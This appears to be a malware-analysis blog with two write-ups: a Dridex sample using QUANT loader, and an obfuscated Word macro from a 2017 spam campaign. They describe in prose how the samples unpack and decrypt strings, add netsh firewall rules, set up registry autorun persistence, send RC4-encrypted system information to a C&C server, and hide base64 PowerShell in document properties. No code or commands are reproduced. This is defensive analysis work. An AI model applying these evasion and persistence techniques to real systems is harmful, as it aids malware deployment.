Dridex are using QUANT Loader

Dridex are one of the known malware now. It was one the malware delivered by some spam e-mail campaign to infect users.

The interesting stuff was some of its samples are now using QUANT loader to execute its code. A loader use by different malware to bypassed detection, Firewall and etc.

let us dig more... :)

At first look the file is really packed  and need to unpacked to see the actual code.

fig. 1 packed code of dridex

as the file is unpack using some debugger and reverse engineering we can see some interesting string that may give as some hint what it will try to do and how it was compiled.

base on the fig. 2 below, it looks like the unpack code is compiled using MINGW32.

fig. 2 MINGW32 string

and on fig. 3 we can see that there is a base64 encoded string, some hash value and some string that may related to URL link "index.php". so we can say initially that this file can connect to a url link.

fig. 3 some unique string

fig. 3.1 common internet download api

now lets go deeper with the code and we will see that Dridex use "QUANT" loader to execute its code.

the first interesting stuff is how it concatenate all its decrypted string using the hash value we saw in the string analysis and and execute it later.

fig. 4 decryption routine.

fig.5 decrypted string

it will create a copy of itself in %appdata%/randonnumber/svchost.exe.

fig.6 copy of itself

then you will see the common characteristics of QUANT loader where its assemble its netsh command to allow copy of itself be executed in firewall.

fig. 7 netsh command

it will also assemble some url link to connect on.

fig. 8 url link

it will also "CreateFile" to the copy of itself "svchost.exe" with alternate data stream "zone.identifier". This ADS are used to know that file origin and make a security flag if the file is untrusted.

fig. 8 Zone.identifier ADS

Next it will get the Username of the infected machine by calling GetUserName the create a commandline that will change the user permission to the copy of itself to readonly. then run the copy of itself in %appdata% the svchost.exe.

fig. 9 modifying the permission of the infected user

fig. 10 running the copy of itself

the malware has a checking if the copy of itself is the running by checking the filepath of svchost.exe to the modulefilename. if yes it will create autorun registry by using regini.exe and a file containing the regrun hives placed in %temp%/per

fig. 11 autorun registry creation

one of the notable behavior of  its upx file component place in its resource section is it parse some computer information and send to its C&C server that are RC4 encrypted with specific rc4 key.
Some sensitive information:

• Computername
• ProductVersion
• SystemInfo (Processor) 
• Memory Status

fig. 12 some information it tries to steal

Another Macro Obfuscation Technique...

Sha1: 98010df0a368151f9d831d3e18e957137600d142 

Filename: Purchase Order _ 5894568.doc1.bin

I found a macro malware sample hosted by the spam campaign happened last October 10, 2017 and the technique to hide its encrypted code was interesting.

at first, the document looks so suspicious where it contain a picture shown in fig. 1 and ask user to enable the macro to see the document.

fig. 1: common macro social engineering approach

 And using Didier Stevens tool 'oledump.py', I do a quick static analysis and confirmed that the document contain macro code.

fig. 2: macro code

So I look more deep to the macro code and found an interesting stuff how it hides the b64 encoded script code on its body. It used the BuiltInDocumentProperties(´comments´) to hide it. It will parse that base64 encoded code with specific length then concatenate it to other b64 encoded string to form the script it will execute using powershell –e.

fig. 3: b64 encoded script

As I decode the base64 string, it will produce an obfuscated script as shown in fig 4. and using some python script it will show that it will download .exe file to some malicious url link save it in %temp% and then execute it without user consent.

fig. 4: obfuscated script

fig. 5: decrypted script